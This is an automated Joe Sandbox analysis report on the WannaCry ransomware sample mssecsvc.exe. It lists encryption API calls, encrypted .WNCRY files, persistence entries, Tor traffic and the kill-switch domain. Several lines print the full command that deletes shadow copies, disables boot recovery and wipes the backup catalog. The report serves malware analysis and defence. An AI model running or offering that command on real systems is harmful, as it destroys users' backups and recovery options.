
Analysis Report

Overview

General Information

Joe Sandbox Version: 18.0.0
Analysis ID: 269081
Start time: 18:52:11
Joe Sandbox Product: Cloud
Start date: 12.05.2017
Overall analysis duration: 0h 12m 5s
Report type: full
Sample file name: mssecsvc.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
Detection: MAL
Classification: mal100.evad.rans.phis.spyw.troj.winEXE@57/432@2/8
HCA Information:
  • Successful, ratio: 72%
  • Number of executed functions: 230
  • Number of non-executed functions: 254
EGA Information:
  • Successful, ratio: 90%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): svchost.exe, VSSVC.exe, conhost.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Too many dropped files, some of them have not been restored


Detection

Strategy   Score  Range    Reporting       Detection
Threshold  100    0 - 100  Report FP / FN  malicious


Confidence

Strategy   Score  Range  Further Analysis Required?
Threshold  5      0 - 5  false


Classification

Analysis Advice

Sample drops PE files which have not been started; submit the dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons; it likely requires more UI automation
Sample is a service DLL, but no service has been registered
Sample sleeps for a long time; analyze it with the 'Bypass long sleeps' cookbook
Uses HTTPS for network communication; use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview



Change of System Appearance:

Contains functionality to change the wallpaper
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004F20 swprintf,swprintf,MultiByteToWideChar,CopyFileW,CopyFileW,GetUserNameW,_wcsicmp,SystemParametersInfoW,swprintf,CopyFileW,5_2_10004F20
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,14_2_00407E80
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 18_1_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,18_1_00407E80

Operating System Destruction:

Mass deletion, destroys many files
Source: c:\programdata\ywepvofkuzu108\tasksche.exe | File deleted: Number of file deletions (1001) exceeds threshold (400)

Cryptography:

Public key (encryption) found
Source: taskhsvc.exe | Binary or memory string: -----BEGIN RSA PUBLIC KEY-----
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\tasksche.exe | Code function: 3_2_004018B9 CryptReleaseContext,3_2_004018B9
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004170 CryptExportKey,CryptGetKeyParam,GlobalAlloc,CryptEncrypt,GlobalFree,5_2_10004170
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10003C00 CryptDestroyKey,5_2_10003C00
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,5_2_10003AC0
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004040 CryptExportKey,GlobalAlloc,CryptExportKey,_local_unwind2,CreateFileA,WriteFile,_local_unwind2,5_2_10004040
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004350 CryptGenKey,5_2_10004350
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,5_2_10003F00
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,5_2_10004440
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004370 EnterCriticalSection,CryptEncrypt,LeaveCriticalSection,LeaveCriticalSection,5_2_10004370
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004420 CryptGenRandom,5_2_10004420
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10003D10 GetFileAttributesA,CryptEncrypt,_local_unwind2,CryptDecrypt,GetFileAttributesA,strncmp,_local_unwind2,5_2_10003D10
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10003A80 GetFileAttributesA,GetFileAttributesA,CryptAcquireContextA,5_2_10003A80
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10003BB0 GetFileAttributesA,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,5_2_10003BB0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004046F0 CryptImportKey,14_2_004046F0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004046B0 CryptAcquireContextA,14_2_004046B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,14_2_004049B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,14_2_004047C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,14_2_00404AF0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,14_2_00404770
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,14_2_00404B70
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 18_1_00404770 CryptReleaseContext,18_1_00404770
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | Code function: 19_2_0033D6F1 CRYPTO_num_locks,CRYPTO_set_locking_callback,CRYPTO_THREADID_set_callback,__stack_chk_fail,19_2_0033D6F1
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | Code function: 19_2_00335EA1 ERR_load_crypto_strings,OPENSSL_add_all_algorithms_noconf,SSLeay_version,strcmp,__stack_chk_fail,19_2_00335EA1
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | Code function: 19_2_0033C797 abort,CryptAcquireContextA,CryptGenRandom,__stack_chk_fail,19_2_0033C797
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | Code function: 19_2_00339423 i2d_RSAPrivateKey,free,CRYPTO_free,__stack_chk_fail,19_2_00339423
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | Code function: 19_2_0033E737 i2d_X509,free,X509_free,memcpy,CRYPTO_free,X509_get_pubkey,EVP_PKEY_get1_RSA,EVP_PKEY_free,__stack_chk_fail,19_2_0033E737
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | Code function: 19_2_00337FA7 abort,abort,abort,abort,abort,RSA_public_decrypt,__stack_chk_fail,19_2_00337FA7

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,5_2_10003AC0
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,5_2_10003F00
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,5_2_10004440
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004046F0 CryptImportKey,14_2_004046F0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,14_2_004049B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,14_2_00404B70
Deletes shadow drive data (may be related to ransomware)
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: unknown | Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: @WanaDecryptor@.exe | Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe | Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe | Binary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe | Binary or memory string: 2@Z3EDITc vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietffv
Source: @WanaDecryptor@.exe | Binary or memory string: C:\ProgramData\ywepvofkuzu108\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\system32\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\system32\cmd.exe=C:=C:\ProgramData\ywepvofkuzu108ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Windows\system32\config\systemprofile\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCOMPUTERNAME=ADMIN-PCComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOLOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe | Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
May disable shadow drive data (uses vssadmin)
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRY

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_004035A0

Networking:

Contains functionality to download additional files from the internet
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_0040DB80 recv,14_2_0040DB80
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1  Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com  Cache-Control: no-cache
Found strings which match to known social media urls
Source: @WanaDecryptor@.exe | String found in binary or memory: Yahoo equals www.yahoo.com (Yahoo)
Source: taskhsvc.exe | String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Urls found in memory or binary data
Source: @WanaDecryptor@.exe | String found in binary or memory: http://
Source: @WanaDecryptor@.exe | String found in binary or memory: http://%d/%d/%d
Source: taskhsvc.exe | String found in binary or memory: http://%s
Source: taskhsvc.exe | String found in binary or memory: http://%s:%d
Source: taskhsvc.exe | String found in binary or memory: http://%s:%dhttp://%s
Source: taskhsvc.exe | String found in binary or memory: http://%sencoding
Source: taskhsvc.exe | String found in binary or memory: http://freehaven.net/anonbib/#hs-attack06
Source: taskhsvc.exe | String found in binary or memory: http://skipping
Source: @WanaDecryptor@.exe | String found in binary or memory: http://www.btcfrog.com/qr/bitcoinpng.php?address=%s
Source: @WanaDecryptor@.exe | String found in binary or memory: http://www.btcfrog.com/qr/bitcoinpng.php?address=%smailto:%shttps://www.google.com/search?q=how
Source: mssecsvc.exe | String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Source: mssecsvc.exe | String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Source: taskhsvc.exe | String found in binary or memory: http://www.openssl.org/support/faq.html
Source: taskhsvc.exe | String found in binary or memory: http://www.openssl.org/support/faq.htmlrand
Source: taskhsvc.exe | String found in binary or memory: http://www.openssl.org/v
Source: @WanaDecryptor@.exe | String found in binary or memory: http://www.zlib.net/d
Source: @WanaDecryptor@.exe | String found in binary or memory: https://
Source: taskhsvc.exe | String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
Source: taskhsvc.exe | String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayerror
Source: @WanaDecryptor@.exe | String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
Source: @WanaDecryptor@.exe | String found in binary or memory: https://en.wikipedia.org/wiki/bitcoin
Source: @WanaDecryptor@.exe | String found in binary or memory: https://en.wikipedia.org/wiki/bitcoinsend
Source: taskhsvc.exe | String found in binary or memory: https://trac.torproject.org/8742
Source: taskhsvc.exe | String found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
Source: taskhsvc.exe | String found in binary or memory: https://wiki.torproject.org/theonionrouter/torfaq#socksanddns.%s
Source: taskhsvc.exe | String found in binary or memory: https://wiki.torproject.org/theonionrouter/torfaq#socksanddns.%sdangerous_socks
Source: @WanaDecryptor@.exe | String found in binary or memory: https://www.google.com/search?q=how
Source: taskhsvc.exe | String found in binary or memory: https://www.torproject.org/
Source: taskhsvc.exe | String found in binary or memory: https://www.torproject.org/docs/faq.html#bestosforrelay
Source: taskhsvc.exe | String found in binary or memory: https://www.torproject.org/documentation.html
Source: taskhsvc.exe | String found in binary or memory: https://www.torproject.org/download/download#warning
Source: taskhsvc.exe | String found in binary or memory: https://www.torproject.org/download/download#warningalphabetathis
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown | Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown | Network traffic detected: HTTP traffic on port 49195 -> 443
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1  Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com  Cache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.1.16:49198 -> 79.137.85.71:9001
Source: global traffic | TCP traffic: 192.168.1.16:49199 -> 195.154.107.23:993
Source: global traffic | TCP traffic: 192.168.1.16:49200 -> 138.68.0.4:9090
Installs TOR (Internet Anonymizer)
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\tor.exe

Boot Survival:

Contains functionality to start windows services
Source: C:\mssecsvc.exe | Code function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,0_2_00408090
Creates an autostart registry key
Source: C:\Windows\System32\reg.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ywepvofkuzu108
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SD89A7.tmp
Stores files to the Windows start menu directory
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\~SD8948.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\~SD8949.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\.sol Editor\~SD895A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\~SD895B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD896B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD896C.tmp
